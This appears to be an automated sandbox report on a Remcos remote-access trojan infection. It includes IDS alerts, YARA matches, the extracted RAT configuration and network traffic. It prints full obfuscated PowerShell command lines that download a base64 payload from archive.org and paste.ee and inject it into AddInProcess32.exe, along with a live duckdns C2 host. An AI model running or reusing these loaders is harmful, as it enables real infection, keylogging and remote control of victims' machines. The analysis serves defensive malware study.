aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". 
((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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

            Stealing of Sensitive Information

            Source: Registry Key setAuthor: Joe Security: Data: Details: 4B 50 28 47 63 4D 09 1F 3F 91 C0 C4 04 16 31 9C 89 72 0C C1 0A 04 A3 A6 E8 6B CD 38 92 C9 23 4B 9A 51 86 2C D4 8A 10 C6 43 F1 3E D1 3A A5 AE D8 97 7D 69 29 C5 15 58 BB D5 4B 11 1B 5C 8E 57 6F BB 9B 14 E4 25 B2 42 CC E7 1A 86 00 AB C2 6E E3 D6 AE C6 13 BE FA 9B 97 07 B5 36 A7 96 94 97 40 8B 13 F4 35 71 82 4E 46 DA 37 31 FD 23 07 21 62 D4 AE A6 04 BF B0 39 AF D3 C0 0B 8A E9 48 CD AB E3 5F , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 4188, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-XDNGQ0\exepath
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-26T10:58:07.298698+0200 | 2020423 | 1 | Exploit Kit Activity Detected | 188.114.97.3 | 443 | 192.168.2.6 | 49712 | TCP

            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-26T10:58:07.298698+0200 | 2020424 | 1 | Exploit Kit Activity Detected | 188.114.97.3 | 443 | 192.168.2.6 | 49712 | TCP

            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-26T10:58:09.556119+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49713 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:12.269130+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49715 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:14.960707+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49716 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:17.587794+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49720 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:20.242842+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49722 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:22.913558+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49724 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:25.555536+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49725 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:28.210996+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49726 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:30.882978+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49727 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:33.508255+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49728 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:36.133301+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49729 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:38.805103+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49730 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:41.449621+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49732 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:44.056777+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52102 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:46.695749+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52103 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:49.321937+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52104 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:51.977856+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52105 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:54.639365+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52106 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:57.289503+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52107 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:58:59.931275+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52108 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:02.575895+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52109 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:05.211109+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52111 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:07.851896+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52112 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:20.958757+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52113 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:23.572392+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52114 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:26.214181+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52115 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:28.854186+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52116 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:31.526186+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52117 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:34.132700+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52119 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:36.773249+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52120 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:39.460610+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52121 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:42.104552+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52122 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:44.711300+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52123 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:47.322623+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52124 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:49.853288+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52125 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:52.402234+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52126 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:54.930365+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52127 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:57.386279+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52128 | 181.236.206.3 | 2404 | TCP
            2024-09-26T10:59:59.806269+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52129 | 181.236.206.3 | 2404 | TCP
            2024-09-26T11:00:02.198263+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52130 | 181.236.206.3 | 2404 | TCP
            2024-09-26T11:00:04.601059+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52131 | 181.236.206.3 | 2404 | TCP
            2024-09-26T11:00:06.976502+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 52132 | 181.236.206.3 | 2404 | TCP

            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-26T10:58:07.123709+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49712 | 188.114.97.3 | 443 | TCP


            AV Detection

            Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | Avira URL Cloud: Label: malware
            Source: newssssssssssssss.duckdns.org | Avira URL Cloud: Label: malware
            Source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack | Malware Configuration Extractor: Remcos {"Version": "4.9.4 Pro", "Host:Port:Password": "newssssssssssssss.duckdns.org:2404:0", "Assigned name": "Matrix Fenix*", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-XDNGQ0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Source: Yara match | File source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 4188, type: MEMORYSTR
            Source: Yara match | File source: C:\ProgramData\remcos\registros.dat, type: DROPPED
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,7_2_00433837
            Source: powershell.exe, 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_35ef43af-6

            Exploits

            Source: Yara match | File source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 4188, type: MEMORYSTR

            Privilege Escalation

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_004074FD _wcslen,CoGetObject,7_2_004074FD
            Source: unknown | HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.2295468999.000001B0A7DC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2268054152.000001B0A0747000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,7_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,7_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0044E879 FindFirstFileExA,7_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,7_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0040783C FindFirstFileW,FindNextFileW,7_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_00419AF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_00407C97

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49713 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49716 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49715 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49720 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49722 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49727 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49728 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49732 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49725 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52103 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49730 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49729 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52106 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52104 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52108 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52107 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52109 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52112 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52102 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49726 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52113 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52114 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52117 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52115 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52111 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52122 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52121 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52119 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52126 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52120 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52124 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52127 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52130 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52132 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52129 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52123 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52131 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52125 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52128 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49724 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52105 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52116 -> 181.236.206.3:2404
            Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49712 -> 188.114.97.3:443
            Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 188.114.97.3:443 -> 192.168.2.6:49712
            Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 188.114.97.3:443 -> 192.168.2.6:49712
            Source: Malware configuration extractor | URLs: newssssssssssssss.duckdns.org
            Source: unknown | DNS query: name: paste.ee
            Source: unknown | DNS query: name: newssssssssssssss.duckdns.org
            Source: global traffic | TCP traffic: 192.168.2.6:49713 -> 181.236.206.3:2404
            Source: global traffic | HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1 Host: ia600100.us.archive.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /d/WksSo/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox View | IP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox View | IP Address: 207.241.227.240 207.241.227.240
            Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox View | ASN Name: TELEBUCARAMANGASAESPCO TELEBUCARAMANGASAESPCO
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00404B96 WaitForSingleObject,SetEvent,recv,7_2_00404B96
            Source: global traffic | HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1 Host: ia600100.us.archive.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /d/WksSo/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
            Source: global traffic | DNS traffic detected: DNS query: ia600100.us.archive.org
            Source: global traffic | DNS traffic detected: DNS query: paste.ee
            Source: global traffic | DNS traffic detected: DNS query: newssssssssssssss.duckdns.org
            Source: AddInProcess32.exe | String found in binary or memory: http://geoplugin.net/json.gp
